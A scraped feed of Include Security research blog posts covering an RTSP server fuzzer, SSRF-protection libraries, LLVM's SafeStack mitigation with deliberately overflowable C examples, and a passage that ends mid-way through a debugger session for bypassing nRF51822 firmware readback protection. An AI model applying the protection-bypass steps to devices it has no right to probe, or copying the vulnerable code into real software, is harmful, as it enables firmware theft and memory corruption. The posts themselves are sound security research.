Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Announcing RTSPhuzz — An RTSP Server Fuzzer

15 June 2020 at 14:00

There are many ways software is tested for faults, some of those faults end up originating from exploitable memory corruption situations and are labeled vulnerabilities. One popular method used to identify these types of faults in software is runtime fuzzing.

When developing servers that implement an RFC defined protocol, dynamically mutating the inputs and messages sent to the server is a good strategy for fuzzing. The Mozilla security team has used fuzzing internally to great effect on their systems and applications over the years. One area that Mozilla wanted to see more open source work in was fuzzing of streaming media protocols, specifically RTSP.

Towards that goal IncludeSec is today releasing https://github.com/IncludeSecurity/RTSPhuzz. We’re also excited to announce the work of the initial development of the tool has been sponsored by the Mozilla Open Source Support (MOSS) awards program. RTSPhuzz is provided as free and open unsupported software for the greater good of the maintainers and authors of RTSP services — FOSS and COTS alike!

RTSPhuzz is based on the boofuzz framework, it and connects as a client to target RTSP servers and fuzzes RTSP messages or sequences of messages. In the rest of this post we’ll cover some of the important bits to know about it. If you have an RTSP server, go ahead and jump right into our repo and shoot us a note to say hi if it ends up being useful to you.

Existing Approaches

We are aware of two existing RTSP fuzzers, StreamFUZZ and RtspFuzzer.

RtspFuzzer uses the Peach fuzzing framework to fuzz RTSP responses, however it targets RTSP client implementations, whereas our fuzzer targets RTSP servers.

StreamFUZZ is a Python script that does not utilize a fuzzing framework. Similar to our fuzzer, it fuzzes different parts of RTSP messages and sends them to a server. However, it is more simplistic; it doesn’t fuzz as many messages or header fields as our fuzzer, it does not account for the types of the fields it fuzzes, and it does not keep track of sessions for fuzzing sequences of messages.

Approach to Fuzzer Creation

The general approach for RTSPhuzz was to first review the RTSP RFC carefully, then define each of the client-to-server message types as boofuzz messages. RTSP headers were then distributed among the boofuzz messages in such a way that each is mutated by the boofuzz engine in at least one message, and boofuzz messages are connected in a graph to reasonably simulate RTSP sessions. Header values and message bodies were given initial reasonable default values to allow successful fuzzing of later messages in a sequence of messages. Special processing is done for several headers so that they conform to the protocol when different parts of messages are being mutated. The boofuzz fuzzing framework gives us the advantage of being able to leverage its built-in mutations, logging, and web interface.

Using RTSPhuzz

You can grab the code from github. Then, specify the server host, server port, and RTSP path to a media file on the target server:

RTSPhuzz.py --host target.server.host --port 554 --path test/media/file.mp3

Once RTSPhuzz is started, the boofuzz framework will open the default web interface on localhost port 26000, and will record results locally in a boofuzz-results/ directory. The web interface can be re-opened for the database from a previous run with boofuzz’s boo tool:

boo open <run-*.db>

See the RTSPhuzz readme for more detailed options and ways to run RTSPhuzz, and boofuzz’s documentation for more information on boofuzz.

Open Source and Continued Development

This is RTSPhuzz’s initial release for open use by all. We encourage you to try it out and share ways to improve the tool. We will review and accept PRs, address bugs where we can, and also would love to hear any shout-outs for any bugs you find with this tool (@includesecurity).

The post Announcing RTSPhuzz — An RTSP Server Fuzzer appeared first on Include Security Research Blog.

IncludeSec’s free training in Buenos Aries for our Argentine hacker friends.

29 April 2019 at 20:20

One of the things that has always been important in IncludeSec’s progress as a company is finding the best talent for the task at hand. We decided early on that if the best Python hacker in the world was not in the US then we would go find that person and work with them! Or whatever technology the project at hand is; C, Go, Ruby, Scala, Java, etc.

As it turns out the best Python hackers (and many other technologies) might actually be in Argentina. We’re not the only ones that have noticed this. Immunity Security, IOActive Security, Gotham Digital Science, and many others have a notable presence in Argentina (The NY Times even wrote an article on how great the hackers are there!) We’ve worked with dozens of amazing Argentinian hackers over the last six years comprising ~30% of our team and we’ve also enjoyed the quality of the security conferences like EkoParty in Buenos Aires.

As a small thank you to the entire Argentinian hacker scene, we’re going to do a free training class on May 30/31st 2019 teaching advanced web hacking techniques. This training is oriented towards hackers earlier in their career who have already experienced the world of OWASP top 10 and are looking to take their hacking skills to the next level.

If that sounds like you, you’re living in Argentina, and can make it to Buenos Aires on May 30th & 31st then this might be an awesome opportunity for you!

Please fill out the application here if this is something that would be awesome for you. We’ll close the application on May 10th.
https://docs.google.com/forms/d/e/1FAIpQLScrjV8wei7h-AY_kW7QwXZkYPDvSQswzUy6BTT9zg8L_Xejxg/viewform?usp=sf_link

Gracias,

Erik Cabetas
Managing Partner

The post IncludeSec’s free training in Buenos Aries for our Argentine hacker friends. appeared first on Include Security Research Blog.

Introducing: SafeURL – A set of SSRF Protection Libraries

At Include Security, we believe that a reactive approach to security can fall short when it’s not backed by proactive roots. We see new offensive tools for pen-testing and vulnerability analysis being created and released all the time. In regards to SSRF vulnerabilities, we saw an opportunity to release code for developers to assist in protecting against these sorts of security issues. So we’re releasing a new set of language specific libraries to help developers effectively protect against SSRF issues. In this blog post, we’ll introduce the concept of SafeURL; with details about how it works, as well as how developers can use it, and our plans for rewarding those who find vulnerabilities in it!

Preface: Server Side Request Forgery

Server Side Request Forgery (SSRF) is a vulnerability that gives an attacker the ability to create requests from a vulnerable server. SSRF attacks are commonly used to target not only the host server itself, but also hosts on the internal network that would normally be inaccessible due to firewalls.
SSRF allows an attacker to:

  • Scan and attack systems from the internal network that are not normally accessible
  • Enumerate and attack services that are running on these hosts
  • Exploit host-based authentication services

As is the case with many web application vulnerabilities, SSRF is possible because of a lack of user input validation. For example, a web application that accepts a URL input in order to go fetch that resource from the internet can be given a valid URL such as http://google.com
But the application may also accept URLs such as:

When those kinds of inputs are not validated, attackers are able to access internal resources that are not intended to be public.

Our Proposed Solution

SafeURL is a library, originally conceptualized as “SafeCURL” by Jack Whitton (aka @fin1te), that protects against SSRF by validating each part of the URL against a white or black list before making the request. SafeURL can also be used to validate URLs. SafeURL intends to be a simple replacement for libcurl methods in PHP and Python as well as java.net.URLConnection in Scala.
The source for the libraries are available on our Github:

  1. SafeURL for PHP – Primarily developed by @fin1te
  2. SafeURL for Python – Ported by @nicolasrod
  3. SafeURL for Scala – Ported by @saelo

Other Mitigation Techniques

Our approach is focused on protection on the application layer. Other techniques used by some Silicon Valley companies to combat SSRF include:

  • Setting up wrappers for HTTP client calls which are forwarded to a single-purposed proxy that prevents it from talking to any internal hosts based on firewall rules as the HTTP requests are proxied
  • At the application server layer, hijack all socket connections to ensure they meet a developer configured policy by enforcing iptables rules or more advanced interactions with the app server’s networking layer

Installation

PHP

SafeURL can be included in any PHP project by cloning the repository on our Github and importing it into your project.

Python

SafeURL can be used in Python apps by cloning the repository on our Github and importing it like this:

from safeurl import safeurl

Scala

To use SafeURL in Scala applications, clone the repository and store in the app/ folder of your Play application and import it.

import com.includesecurity.safeurl._

Usage

PHP

SafeURL is designed to be a drop-in replacement for the curl_exec() function in PHP. It can simply be replaced with SafeURL::execute() wrapped in a try {} catch {} block.

try {
    $url = "http://www.google.com";

    $curlHandle = curl_init();
    //Your usual cURL options
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (SafeURL)");

    //Execute using SafeURL
    $response = SafeURL::execute($url, $curlHandle);
} catch (Exception $e) {
    //URL wasn"t safe
}

Options such as white and black lists can be modified. For example:

$options = new Options();
$options->addToList("blacklist", "domain", "(.*)\.fin1te\.net");
$options->addToList("whitelist", "scheme", "ftp");

//This will now throw an InvalidDomainException
$response = SafeURL::execute("http://example.com", $curlHandle, $options);

//Whilst this will be allowed, and return the response
$response = SafeURL::execute("ftp://example.com", $curlHandle, $options);

Python

SafeURL serves as a replacement for PyCurl in Python.

try:
  su = safeurl.SafeURL()
  res = su.execute("https://example.com";)
except:
  print "Unexpected error:", sys.exc_info()

Example of modifying options:

try:
    sc = safeurl.SafeURL()

    opt = safeurl.Options()
    opt.clearList("whitelist")
    opt.clearList("blacklist")
    opt.setList("whitelist", [ 
    "google.com" , "youtube.com"], "domain")

    su.setOptions(opt)
    res = su.execute("http://www.youtube.com")
except:
    print "Unexpected error:", sys.exc_info()

Scala

SafeURL replaces the JVM Class URLConnection that is normally used in Scala.

try {
  val resp = SafeURL.fetch("http://google.com")
  val r = Await.result(resp, 500 millis)
} catch {
  //URL wasnt safe

Options:

SafeURL.defaultConfiguration.lists.ip.blacklist ::= "12.34.0.0/16"
SafeURL.defaultConfiguration.lists.domain.blacklist ::= "example.com"

Demo, Bug Bounty Contest, and Further Contributions

An important question to ask is: Is SafeURL really safe? Don’t take our word for it. Try to hack it yourself! We’re hosting live demo apps in each language for anyone to try and bypass SafeURL and perform a successful SSRF attack. On each site there is a file called key.txt on the server’s local filesystem with the following .htaccess policy:

<Files key.txt>
Order deny,allow
Deny from allow
Allow from 127.0.0.1

ErrorDocument 403 /oops.html
</Files>

If you can read the contents of the file through a flaw in SafeURL and tell us how you did it (patch plz?), we will contact you about your reward. As a thank you to the community, we’re going to reward up to one Bitcoin for any security issues. If you find a non-security bug in the source of any of our libraries, please contact us as well you’ll have our thanks and a shout-out.
The challenges are being hosted at the following URLs:
PHP: safeurl-php.excludesecurity.com
Python: safeurl-python.excludesecurity.com
Scala: safeurl-scala.excludesecurity.com

If you can contribute a Pull Request and port the SafeURL concept to other languages (such as Java, Ruby, C#, etc.) we could throw you you some Bitcoin as a thank you.

Good luck and thanks for helping us improve SafeURL!

The post Introducing: SafeURL – A set of SSRF Protection Libraries appeared first on Include Security Research Blog.

Strengths and Weaknesses of LLVM’s SafeStack Buffer Overflow Protection

12 November 2015 at 21:00

Introduction

In June 2015, a new memory corruption exploit mitigation named SafeStack was merged into the llvm development branch by Peter Collingbourne from Google and will be available with the upcoming 3.8 release. SafeStack was developed as part of the Code Pointer Integrity (CPI) project but is also available as stand-alone mitigation. We like to stay ahead of the curve on security, so this post aims to discuss the inner workings and the security benefits of SafeStack for consideration in future attacks and possible future improvements to the feature.

SafeStack in a Nutshell

SafeStack is a mitigation similar to (but potentially more powerful than) Stack Cookies. It tries to protect critical data on the stack by separating the native stack into two areas: A safe stack, which is used for control flow information as well as data that is only ever accessed in a safe way (as determined through static analysis). And an unsafe stack which is used for everything else that is stored on the stack. The two stacks are located in different memory regions in the process’s address space and thus prevent a buffer overflow on the unsafe stack from corrupting anything on the safe stack.

SafeStack promises a generally good protection against common stack based memory corruption attacks while introducing only a low performance overhead (around 0.1% on average according to the documentation) when implemented.

When SafeStack is enabled, the stack pointer register (esp/rsp on x86/x64 respectively) will be used for the safe stack while the unsafe stack is tracked by a thread-local variable. The unsafe stack is allocated during initialization of the binary by mmap’ing a region of readable and writable memory and preceding this region with a guard page, presumably to catch stack overflows in the unsafe stack region.

SafeStack is (currently) incompatible with Stack Cookies and disables them when it is used.

Implementation Details

SafeStack is implemented as an llvm instrumentation pass, the main logic is implemented in lib/Transforms/Instrumentation/SafeStack.cpp. The instrumentation pass runs as one of the last steps before (native) code generation.

More technically: The instrumentation pass works by examining all “alloca” instructions in the intermediate representation (IR) of a function (clang first compiles the code into llvm’s intermediate representation and later, after various instrumentation/optimization passes, translates the IR into machine code). An “alloca” instruction allocates space on the stack for a local variable or array. The SafeStack instrumentation pass then traverses the list of instructions that make use of this variable and determines whether these accesses are safe or not. If any access is determined to be “unsafe” by the instrumentation pass, the “alloca” instruction is replaced by code that allocates space on the unsafe stack instead and the instructions using the variable are updated accordingly.

The IsSafeStackAlloc function is responsible for deciding whether a stack variable can ever be accessed in an “unsafe” way. The definition of “unsafe” is currently rather conservative: a variable is relocated to the unsafe stack in the following cases:

  • a pointer to the variable is stored somewhere in memory
  • an element of an array is accessed with a non-constant index (i.e. another variable)
  • a variable sized array is accessed (with constant or non-constant index)
  • a pointer to the variable is given to a function as argument

The SafeStack runtime support, which is responsible for allocating and initializing the unsafe stack, can be found here. As previously mentioned, the unsafe stack is just a regular mmap’ed region.

Exploring SafeStack: Implementation in Practice

Let’s now look at a very simple example to understand how SafeStack works under the hood. For my testing I compiled clang/llvm from source following this guide: http://clang.llvm.org/get_started.html

We’ll use the following C code snippet:

void function(char *str) {
    char buffer[16];
    strcpy(buffer, str);
}

Let’s start by looking at the generated assembly when no stack protection is used. For that we compile with “clang -O1 example.c” (optimization is enabled to reduce noise)

0000000000400580 <function>:
  400580:    48 83 ec 18            sub    rsp,0x18
  400584:    48 89 f8               mov    rax,rdi
  400587:    48 8d 3c 24            lea    rdi,[rsp]
  40058b:    48 89 c6               mov    rsi,rax
  40058e:    e8 bd fe ff ff         call   400450 <strcpy@plt>
  400593:    48 83 c4 18            add    rsp,0x18
  400597:    c3                     ret


Easy enough. The function allocates space on the stack for the buffer at 400580, then calls strcpy with a pointer to the buffer at 40058e. 

Now let’s look at the assembly code generated when using Stack Cookies. For that we need to use the -fstack-protector flag (available in gcc and clang): “clang -O1 -fstack-protector example.c”:

00000000004005f0 <function>:
  4005f0:    48 83 ec 18            sub    rsp,0x18
  4005f4:    48 89 f8               mov    rax,rdi
  4005f7:    64 48 8b 0c 25 28 00   mov    rcx,QWORD PTR fs:0x28
  4005fe:    00 00
  400600:    48 89 4c 24 10         mov    QWORD PTR [rsp+0x10],rcx
  400605:    48 8d 3c 24            lea    rdi,[rsp]
  400609:    48 89 c6               mov    rsi,rax
  40060c:    e8 9f fe ff ff         call   4004b0 <strcpy@plt>
  400611:    64 48 8b 04 25 28 00   mov    rax,QWORD PTR fs:0x28
  400618:    00 00
  40061a:    48 3b 44 24 10         cmp    rax,QWORD PTR [rsp+0x10]
  40061f:    75 05                  jne    400626 <function+0x36>
  400621:    48 83 c4 18            add    rsp,0x18
  400625:    c3                     ret
  400626:    e8 95 fe ff ff         call   4004c0 <_stack_chk_fail@plt>

At 4005f7 the master cookie (the reference value of the cookie) is read from the Thread Control Block (TCB which is a per thread data structure provided by libc) and put on the stack, below the return address. Later, at 40061a,  that value is then compared with the value in the TCB before the function returns. If the two values do not match, __stack_chk_fail is called which terminates the process with a message similar to this one: “*** stack smashing detected ***: ./example terminated“.

Now we’ll enable SafeStack by using the -fsanitize=safe-stack flag: “clang -O1 -fsanitize=safe-stack example.c”:

0000000000410d70 <function>:
  410d70:   41 56                  push   r14
  410d72:   53                     push   rbx
  410d73:   50                     push   rax
  410d74:   48 89 f8               mov    rax,rdi
  410d77:   4c 8b 35 6a 92 20 00   mov    r14,QWORD PTR [rip+0x20926a]
  410d7e:   64 49 8b 1e            mov    rbx,QWORD PTR fs:[r14]
  410d82:   48 8d 7b f0            lea    rdi,[rbx-0x10]
  410d86:   64 49 89 3e            mov    QWORD PTR fs:[r14],rdi
  410d8a:   48 89 c6               mov    rsi,rax
  410d8d:   e8 be 00 ff ff         call   400e50 <strcpy@plt>
  410d92:   64 49 89 1e            mov    QWORD PTR fs:[r14],rbx
  410d96:   48 83 c4 08            add    rsp,0x8
  410d9a:   5b                     pop    rbx
  410d9b:   41 5e                  pop    r14
  410d9d:   c3                     ret

At 410d7e the current value of the unsafe stack pointer is retrieved from Thread Local Storage (TLS). Since each thread also has it’s own unsafe stack, the stack pointer for the unsafe stack gets stored as a thread local variable. Next, at 410d82, the program allocates space for our buffer on the unsafe thread and writes the new value back to the TLS (410d86). It then calls the strcpy function with a pointer into the unsafe stack. In the function epilog (410d92), the old value of the unsafe stack pointer is written back into TLS (Basically, these instruction do the equivalent of “sub rsp, x; … add rsp, x”, but for the unsafe stack) and the function returns.

If we compile our program with the “-fsanitize=safe-stack option” and an overflow occurs, the saved return address (on the safe stack) is unaffected and the program likely segfaults as it tries to write behind the unsafe stack into unmapped/unwritable memory.

Security Details: Stack Cookies vs. SafeStack

While Stack Cookies provide fairly good protection against stack corruption exploits, the security measure in general has a few weaknesses. In particular, bypasses are possible in at least the following scenarios:

  • The vulnerability in code is a non-linear overflow/arbitrary relative write on the stack. In this case the cookie can simply be “skipped over”.
  • Data (e.g. function pointers) further up the stack can be corrupted and are used before the function returns.
  • The attacker has access to an information leak. Depending on the nature of the leak, the attacker can either leak the cookie from the stack directly or leak the master cookie. Once obtained, the attacker overflows the stack and overwrites the cookie again with the value obtained in the information leak.
  • In the case of weak entropy. If not enough entropy is available during generation of the cookie value, an attacker may be able to calculate the correct cookie value.
  • In the case of a forking service, the stack cookie value will stay the same for all child processes. This may make it possible to bruteforce the stack cookie value byte-by-byte, overwriting only a single byte of the cookie and observing whether the process crashes (wrong guess) or continues past the next return statement (correct guess). This would require at most 255 tries per unknown stack cookie byte.

It is important to note however, that most stack based overflows that are caused by functions operating on C strings (e.g. strcpy) are unexploitable when compiled with stack cookies enabled. As most stack cookie implementations usually force one of the bytes of the stack cookie to be a zero byte which makes string overwriting past that impossible with a C string (it’s still possible with a network buffer and raw memory copy though).

Possible Implementation bugs aside, SafeStack is, at least in theory, immune to all of these due to the separation of the memory regions.

However, what SafeStack (by design) does not protect against is corruption of data on the unsafe stack. Or, phrased differently, the security of SafeStack is based around the assumption that no critical data is stored on the unsafe stack.

Moreover, in contrast to Stack Cookies, SafeStack does not prevent the callee from corrupting data of the caller (more precisely, Stack Cookies prevent the caller from using the corrupted data after the callee returns). The following example demonstrates this:

void smash_me() {
    char buffer[16];
    gets(buffer);
}

int main() {
    char buffer[16];
    memset(buffer, 0, sizeof(buffer));
    smash_me();
    puts(buffer);
    return 0;
}

Compiling this code with “-fsanitize=safe-stack” and supplying more than 16 bytes as input will overflow into the buffer of main() and corrupt its content. In contrast, when compiled with “-fstack-protector”, the overflow will be detected and the process terminated before main() uses the corrupted buffer.
This weakness could be (partially) addressed by using Stack Cookies in addition to SafeStack. In this scenario, the master cookie could even be stored on the safe stack and regenerated for every function call (or chain of function calls). This would further protect against some of the weaknesses of plain Stack Cookies as described above.

The lack of unsafe stack protections combined with the conservativeness of the current definition of “unsafe” in the implementation potentially provides an attacker with enough critical data on the unsafe stack to compromise the application. As an example, we’ll devise a, more or less, realistic piece of code that will result in the (security critical) variable ‘pl’ being placed on the unsafe stack, above ‘buffer’ (Although it seems that enabling optimization during compilation causes less variables to be placed on the unsafe stack):

void determine_privilege_level(int *pl) {
    // dummy function
    *pl = 0x42;
}

int main() {
    int pl;
    char buffer[16];
    determine_privilege_level(&pl);
    gets(buffer);             // This can overflow and corrupt 'pl'
    printf("privilege level: %xn", pl);
    return 0;
}

This “data-only” attack is possible due to the fact that the current implementation never recurses into called functions but rather considers (most) function arguments as unsafe.

The risk of corrupting critical data on the unsafe stack can however be greatly decreased through improved static analysis, variable reordering, and, as mentioned above, by protecting the callee’s unsafe stack frame.

It should also be noted that the current implementation does not protect the safe stack in any other way besides system level ASLR. This means that an information leak combined with an arbitrary write primitive will still allow an attacker to overwrite the return address (or other data) on the safe stack. See the comment at the top of the runtime support implementation for more information. Finally we should mention there has been an academic study that points out some additional detail regarding CPI.

Conclusion

With the exceptions noted above, SafeStack’s implemented security measures are a superset of those of Stack Cookies, allowing it to prevent exploitation of stack based vulnerabilities in many scenarios. This combined with the low performance overhead could make SafeStack a good choice during compilation in the future.

SafeStack is still in its early stages, but it looks to be a very promising new addition to a developer’s arsenal of compiler provided exploit mitigations. We wouldn’t call it the end-all of buffer overflows, but it’s a significant hurdle for attackers to overcome.

The post Strengths and Weaknesses of LLVM’s SafeStack Buffer Overflow Protection appeared first on Include Security Research Blog.

Firmware dumping technique for an ARM Cortex-M0 SoC

5 November 2015 at 20:00

One of the first major goals when reversing a new piece of hardware is getting a copy of the firmware. Once you have access to the firmware, you can reverse engineer it by disassembling the machine code.

Sometimes you can get access to the firmware without touching the hardware, by downloading a firmware update file for example. More often, you need to interact with the chip where the firmware is stored. If the chip has a debug port that is accessible, it may allow you to read the firmware through that interface. However, most modern chips have security features that when enabled, prevent firmware from being read through the debugging interface. In these situations, you may have to resort to decapping the chip, or introducing glitches into the hardware logic by manipulating inputs such as power or clock sources and leveraging the resulting behavior to successfully bypass these security implementations.

This blog post is a discussion of a new technique that we’ve created to dump the firmware stored on a particular Bluetooth system-on-chip (SoC), and how we bypassed that chip’s security features to do so by only using the debugging interface of the chip. We believe this technique is a vulnerability in the code protection features of this SoC and as such have notified the IC vendor prior to publication of this blog post.

The SoC

The SoC in question is a Nordic Semiconductor nRF51822. The nRF51822 is a popular Bluetooth SoC with an ARM Cortex-M0 CPU core and built-in Bluetooth hardware. The chip’s manual is available here.

Chip security features that prevent code readout vary in implementation among the many microcontrollers and SoCs available from various manufacturers, even among those that use the same ARM cores. The nRF51822’s code protection allows the developer to prevent the debugging interface from being able to read either all of code and memory (flash and RAM) sections, or a just a subsection of these areas. Additionally, some chips have options to prevent debugger access entirely. The nRF51822 doesn’t provide such a feature to developers; it just disables memory accesses through the debugging interface.

The nRF51822 has a serial wire debug (SWD) interface, a two-wire (in addition to ground) debugging interface available on many ARM chips. Many readers may be familiar with JTAG as a physical interface that often provides access to hardware and software debugging features of chips. Some ARM cores support a debugging protocol that works over the JTAG physical interface; SWD is a different physical interface that can be used to access the same software debugging features of a chip that ARM JTAG does. OpenOCD is an open source tool that can be used to access the SWD port.

This document contains a pinout diagram of the nRF51822. Luckily the hardware target we were analyzing has test points connected to the SWDIO and SWDCLK chip pins with PCB traces that were easy to follow. By connecting to these test points with a SWD adapter, we can use OpenOCD to access the chip via SWD. There are many debug adapters supported by OpenOCD, some of which support SWD.

Exploring the Debugger Access

Once OpenOCD is connected to the target, we can run debugging commands, and read/write some ARM registers, however we are prevented from reading out the code section. In the example below, we connect to the target with OpenOCD and attempt to read memory sections from the target chip. We proceed to reset the processor and read from the address 0x00000000 and the address that we determine is in the program counter (pc) register (0x000114cc), however nothing but zeros is returned. Of course we know there is code there, but the code protection counter-measures are preventing us from accessing it:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> mdw 0x00000000
0x00000000: 00000000
> mdw 0x000114cc 10
0x000114cc: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0x000114ec: 00000000 00000000

We can however read and write CPU registers, including the program counter (pc), and we can single-step through instructions (we just don’t know what instructions, since we can’t read them):

> reg r0 0x12345678
r0 (/32): 0x12345678
> step
target state: halted
target halted due to single-step, current mode: Thread 
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg pc 0x00011500
pc (/32): 0x00011500
> step
target state: halted
target halted due to single-step, current mode: Thread 
xPSR: 0xc1000000 pc: 0x00011502 msp: 0x20001bd0

We can also read a few of the memory-mapped configuration registers. Here we are reading a register named “RBPCONF” (short for readback protection) in a collection of registers named “UICR” (User Information Configuration Registers); you can find the address of this register in the nRF51 Series Reference Manual:

> mdw 0x10001004
0x10001004: ffff00ff

According to the manual, a value of 0xffff00ff in the RBPCONF register means “Protect all” (PALL) is enabled (bits 15..8, labeled “B” in this table, are set to 0), and “Protect region 0” (PR0) is disabled (bits 7..0, labeled “A”, are set to1):

The PALL feature being enabled is what is responsible for preventing us from accessing the code section and subsequently causing our read commands to return zeros.

The other protection feature, PR0, is not enabled in this case, but it’s worth mentioning because the protection bypass discussed in this article could bypass PR0 as well. If enabled, it would prevent the debugger from reading memory below a configurable address. Note that flash (and therefore the firmware we want) exists at a lower address than RAM. PR0 also prevents code running outside of the protected region from reading any data within the protected region.

Unfortunately, it is not possible to disable PALL without erasing the entire chip, wiping away the firmware with it. However, it is possible to bypass this readback protection by leveraging our debug access to the CPU.

Devising a Protection Bypass

An initial plan to dump the firmware via a debugging interface might be to load some code into RAM that reads the firmware from flash into a RAM buffer that we could then read. However, we don’t have access to RAM because PALL is enabled. Even if PALL were disabled, PR0 could have been enabled, which would prevent our code in RAM (which would be the unprotected region) from reading flash (in the protected region). This plan won’t work if either PALL or PR0 is enabled.

To bypass the memory protections, we need a way to read the protected data and we need a place to write it that we can access. In this case, only code that exists in protected memory can read protected memory. So our method of reading data will be to jump to an instruction in protected memory using our debugger access, and then to execute that instruction. The instruction will read the protected data into a CPU register, at which time we can then read the value out of the CPU register using our debugger access. How do we know what instruction to jump to? We’ll have to blindly search protected memory for a load instruction that will read from an address we supply in a register. Once we’ve found such an instruction, we can exploit it to read out all of the firmware.

Finding a Load Instruction

Our debugger access lets us write to the pc register in order to jump to any instruction, and it lets us single step the instruction execution. We can also read and write the contents of the general purpose CPU registers. In order to read from the protected memory, we have to find a load word instruction with a register operand, set the operand register to a target address, and execute that one instruction. Since we can’t read the flash, we don’t know what instructions are where, so it might seem difficult to find the right instruction. However, all we need is an instruction that reads memory from an address in some register to a register, which is a pretty common operation. A load word instruction would work, or a pop instruction, for example.

We can search for the right instruction using trial and error. First, we set the program counter to somewhere we guess a useful instruction might be. Then, we set all the CPU registers to an address we’re interested in and then single step. Next we examine the registers. If we are lucky, the instruction we just executed loaded data from an address stored in another register. If one of the registers has changed to a value that might exist at the target address, then we may have found a useful load instruction.

We might as well start at the reset vector – at least we know there are valid instructions there. Here we’re resetting the CPU, setting the general purpose registers and stack pointer to zero (the address we’re trying), and single stepping, then examining the registers:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Looks like r3 was set to 0x10001014. Is that the value at address zero? Let’s see what happens when we load the registers with four instead:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Nope, r3 gets the same value, so we’re not interested in the first instruction. Let’s continue on to the second:

> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x20001BD0
